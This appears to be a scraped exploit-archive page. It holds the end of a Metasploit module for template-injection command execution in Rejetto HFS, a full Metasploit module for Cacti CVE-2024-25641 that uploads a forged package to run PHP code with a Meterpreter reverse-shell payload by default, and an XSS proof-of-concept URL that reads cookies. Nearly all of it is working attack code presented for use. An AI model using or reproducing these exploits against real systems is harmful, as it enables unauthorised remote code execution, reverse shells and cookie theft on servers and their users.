['GET', 'POST'].sample<br /><br /> opts['uri'] = normalize_uri(target_uri.path)<br /><br /> opts['encode_params'] = false<br /><br /> send_request_cgi(opts)<br /> end<br /><br /> def check<br /> cookie_name = Rex::Text.rand_text_alphanumeric(32)<br /> cookie_value = Rex::Text.rand_text_alphanumeric(32)<br /><br /> # Our check routine will leverage the SSTI vulnerability and use it to read a cookie value by its name, writing<br /> # this value to the response output. In addition we will write the current server version into the response output.<br /> # We can therefore verify if a target is vulnerable by first confirming the expected cookie value is now present<br /> # in the response output, and if so we can also pull out the target servers version number.<br /> res = send_ssti_request_cgi(<br /> "{.cookie|#{cookie_name}.}=%version%=",<br /> {<br /> 'headers' => {<br /> 'Cookie' => "#{cookie_name}=#{cookie_value}"<br /> }<br /> }<br /> )<br /><br /> return CheckCode::Unknown('Connection failed') unless res<br /><br /> return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200<br /><br /> version = res.body.match(/#{cookie_value}=([^=]+)=/)<br /><br /> return CheckCode::Vulnerable("Rejetto HFS version #{version[1]}") if version<br /><br /> CheckCode::Safe<br /> end<br /><br /> def exploit<br /> command_string = "\"cmd\" \"/c #{payload.encoded}\""<br /><br /> command_chars = command_string.unpack('C*').join('|')<br /><br /> # To get code execution we leverage the 'exec' macro. We must leverage the 'chr' macro to construct an arbitrary<br /> # command string in order to avoid the server filtering out certain characters such as '%'. To avoid executing the<br /> # payload 4 times, we leverage the 'break' macro to stop processing the output.<br /> send_ssti_request_cgi("{.exec|{.chr|#{command_chars}.}.}{.break.}")<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Cacti<br /> include Msf::Payload::Php<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Cacti Import Packages RCE',<br /> 'Description' => %q{<br /> This exploit module leverages an arbitrary file write vulnerability<br /> (CVE-2024-25641) in Cacti versions prior to 1.2.27 to achieve RCE. It<br /> abuses the `Import Packages` feature to upload a specially crafted<br /> package that embeds a PHP file. Cacti will extract this file to an<br /> accessible location. The module finally triggers the payload to execute<br /> arbitrary PHP code in the context of the user running the web server.<br /><br /> Authentication is needed and the account must have access to the<br /> `Import Packages` feature. This is granted by setting the `Import<br /> Templates` permission in the `Template Editor` section.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Egidio Romano', # Initial research and discovery<br /> 'Christophe De La Fuente' # Metasploit module<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://karmainsecurity.com/KIS-2024-04'],<br /> [ 'URL', 'https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88'],<br /> [ 'CVE', '2024-25641']<br /> ],<br /> 'Platform' => ['unix linux win'],<br /> 'Privileged' => false,<br /> 'Arch' => [ARCH_PHP, ARCH_CMD],<br /> 'Targets' => [<br /> [<br /> 'PHP',<br /> {<br /> 'Arch' => ARCH_PHP,<br /> 'Platform' => 'php',<br /> 'Type' => :php,<br /> 'DefaultOptions' => {<br /> # Payload is not set automatically when selecting this target.<br /> # Select Meterpreter by default<br /> 'PAYLOAD' => 'php/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Command',<br /> {<br /> 'Arch' => ARCH_CMD,<br /> 'Platform' => [ 'unix', 'linux' ],<br /> 'DefaultOptions' => {<br /> # Payload is not set automatically when selecting this target.<br /> # Select a x64 fetch payload by default.<br /> 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Windows Command',<br /> {<br /> 'Arch' => ARCH_CMD,<br /> 'Platform' => 'win',<br /> 'DefaultOptions' => {<br /> # Payload is not set automatically when selecting this target.<br /> # Select a x64 fetch payload by default.<br /> 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter_reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DisclosureDate' => '2024-05-12',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('USERNAME', [ true, 'User to login with', 'admin']),<br /> OptString.new('PASSWORD', [ true, 'Password to login with', 'admin']),<br /> OptString.new('TARGETURI', [ true, 'The base URI of Cacti', '/cacti'])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> # Step 1 - Check if the target is Cacti and get the version<br /> print_status('Checking Cacti version')<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'index.php'),<br /> 'method' => 'GET',<br /> 'keep_cookies' => true<br /> )<br /> return CheckCode::Unknown('Could not connect to the web server - no response') if res.nil?<br /><br /> html = res.get_html_document<br /> begin<br /> cacti_version = parse_version(html)<br /> version_msg = "The web server is running Cacti version #{cacti_version}"<br /> rescue Msf::Exploit::Cacti::CactiNotFoundError => e<br /> return CheckCode::Safe(e.message)<br /> rescue Msf::Exploit::Cacti::CactiVersionNotFoundError => e<br /> return CheckCode::Unknown(e.message)<br /> end<br /><br /> if Rex::Version.new(cacti_version) < Rex::Version.new('1.2.27')<br /> print_good(version_msg)<br /> else<br /> return CheckCode::Safe(version_msg)<br /> end<br /><br /> # Step 2 - Login<br /> @csrf_token = parse_csrf_token(html)<br /> return CheckCode::Unknown('Could not get the CSRF token from `index.php`') if @csrf_token.empty?<br /><br /> begin<br /> do_login(datastore['USERNAME'], datastore['PASSWORD'], csrf_token: @csrf_token)<br /> rescue Msf::Exploit::Cacti::CactiError => e<br /> return CheckCode::Unknown("Login failed: #{e}")<br /> end<br /><br /> @logged_in = true<br /><br /> # Step 3 - Check if the user has enough permissions to reach `package_import.php`<br /> print_status('Checking permissions to access `package_import.php`')<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'package_import.php'),<br /> 'method' => 'GET',<br /> 'keep_cookies' => true<br /> )<br /> return CheckCode::Unknown('Could not access `package_import.php` - no response') if res.nil?<br /> return CheckCode::Unknown("Could not access `package_import.php` - unexpected HTTP response code: #{res.code}") unless res.code == 200<br /> # The form with the CSRF token input field is not present when access is denied<br /> if parse_csrf_token(res.get_html_document).empty?<br /> return CheckCode::Safe('Could not access `package_import.php` - insufficient permissions')<br /> end<br /><br /> CheckCode::Appears<br /> end<br /><br /> # Taken from modules/payloads/singles/php/exec.rb<br /> def php_exec(cmd)<br /> dis = '$' + rand_text_alpha(4..7)<br /> shell = <<-END_OF_PHP_CODE<br /> #{php_preamble(disabled_varname: dis)}<br /> $c = base64_decode("#{Rex::Text.encode_base64(cmd)}");<br /> #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}<br /> END_OF_PHP_CODE<br /><br /> Rex::Text.compress(shell)<br /> end<br /><br /> def generate_package<br /> @payload_path = "resource/#{rand_text_alphanumeric(5..10)}.php"<br /><br /> php_payload = target['Type'] == :php ? payload.encoded : php_exec(payload.encoded)<br /><br /> digest = OpenSSL::Digest.new('SHA256')<br /> pkey = OpenSSL::PKey::RSA.new(2048)<br /> file_signature = pkey.sign(digest, php_payload)<br /><br /> xml_data = <<~XML<br /> <xml><br /> <files><br /> <file><br /> <name>#{@payload_path}</name><br /> <data>#{Rex::Text.encode_base64(php_payload)}</data><br /> <filesignature>#{Rex::Text.encode_base64(file_signature)}</filesignature><br /> </file><br /> </files><br /> <publickey>#{Rex::Text.encode_base64(pkey.public_key.to_pem)}</publickey><br /> <signature></signature><br /> </xml><br /> XML<br /><br /> signature = pkey.sign(digest, xml_data)<br /> xml_data.sub!('<signature></signature>', "<signature>#{Rex::Text.encode_base64(signature)}</signature>")<br /><br /> Rex::Text.gzip(xml_data)<br /> end<br /><br /> def upload_package<br /> print_status('Uploading the package')<br /> # Default parameters sent when importing packages from the web UI<br /> # Randomizing these values might be suspicious<br /> vars_form = {<br /> '__csrf_magic' => @csrf_token,<br /> 'trust_signer' => 'on',<br /> 'data_source_profile' => '1',<br /> 'remove_orphans' => 'on',<br /> 'replace_svalues' => 'on',<br /> 'image_format' => '3',<br /> 'graph_height' => '200',<br /> 'graph_width' => '700',<br /> 'save_component_import' => '1',<br /> 'preview_only' => 'on',<br /> 'action' => 'save'<br /> }<br /><br /> vars_form_data = []<br /> vars_form.each do |name, data|<br /> vars_form_data << { 'name' => name, 'data' => data }<br /> end<br /><br /> vars_form_data << {<br /> 'name' => 'import_file',<br /> 'filename' => "#{rand_text_alphanumeric(5..10)}.xml.gz",<br /> 'content_type' => 'application/x-gzip',<br /> 'encoding' => 'binary',<br /> 'data' => generate_package<br /> }<br /><br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'package_import.php'),<br /> 'method' => 'POST',<br /> 'keep_cookies' => true,<br /> 'vars_form_data' => vars_form_data<br /> )<br /> fail_with(Failure::Unreachable, 'Could not connect to the web server - no response when sending the preview import request') if res.nil?<br /> fail_with(Failure::UnexpectedReply, "Unexpected response code (#{res.code}) when sending the preview import request") unless res.code == 200<br /><br /> html = res.get_html_document<br /> local_path = html.xpath('//input[starts-with(@id, "chk_file")]/@title').text<br /> fail_with(Failure::Unknown, 'Unable to import the package') if local_path.empty?<br /><br /> vars_form['preview_only'] = ''<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'package_import.php'),<br /> 'method' => 'POST',<br /> 'keep_cookies' => true,<br /> 'vars_post' => vars_form<br /> )<br /> fail_with(Failure::Unreachable, 'Could not connect to the web server - no response when importing the package') if res.nil?<br /> fail_with(Failure::UnexpectedReply, "Unexpected response code when importing the package (#{res.code})") unless res.code == 302<br /><br /> local_path<br /> end<br /><br /> def trigger_payload<br /> # Expecting no response<br /> print_status('Triggering the payload')<br /> send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, @payload_path),<br /> 'method' => 'GET'<br /> }, 1)<br /> end<br /><br /> def exploit<br /> # Setting the `FETCH_DELETE` option seems to break the payload execution.<br /> # `Msf::Exploit::FileDropper` will be used later to cleanup. Note that it<br /> # is not possible to opt-out anymore.<br /> fail_with(Failure::BadConfig, 'FETCH_DELETE must be set to false') if datastore['FETCH_DELETE']<br /><br /> unless @csrf_token<br /> begin<br /> @csrf_token = get_csrf_token<br /> rescue CactiError => e<br /> fail_with(Failure::NotFound, "Unable to get the CSRF token: #{e.class} - #{e}")<br /> end<br /> end<br /><br /> unless @logged_in<br /> begin<br /> do_login(datastore['USERNAME'], datastore['PASSWORD'], csrf_token: @csrf_token)<br /> rescue CactiError => e<br /> fail_with(Failure::NoAccess, "Login failure: #{e.class} - #{e}")<br /> end<br /> end<br /><br /> package_path = upload_package<br /><br /> register_file_for_cleanup(package_path)<br /><br /> # For fetch payloads, setting the `FETCH_DELETE` option seems to break the<br /> # payload execution. Using `#register_file_for_cleanup` instead, since we<br /> # know the local path.<br /> if target['Type'] != :php && payload_instance.is_a?(Msf::Payload::Adapter::Fetch)<br /> if File.absolute_path?(datastore['FETCH_FILENAME'])<br /> register_file_for_cleanup(datastore['FETCH_FILENAME'])<br /> else<br /> register_file_for_cleanup(File.join(File.dirname(package_path), datastore['FETCH_FILENAME']))<br /> end<br /> end<br /><br /> trigger_payload<br /> end<br /><br />end<br /></code></pre>
<pre><code># Exploit Title: Refelcted Cross Site Scripting Exploit - Lost and Found Information System <br /># Exploit Author: Amit Roy (Rezur / AR0x7)<br /># Date: June 07, 2024<br /># Vendor Homepage: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lfis.zip<br /># Tested on: Kali Linux, Apache, Mysql<br /># Version: v1.0<br /># Exploit Description:<br /># Lost and Found Information System v1.0 suffers from a Refelcted Cross Site Scripting Vulnerability allowing attackers to execute javascript in context of other users<br /># CVE : CVE-2024-37859<br /><br />1) Visit the folowing url to trigger the XSS - http://target.com/admin/?page=<img src=x onerror=alert(document.cookie)><br /></code></pre>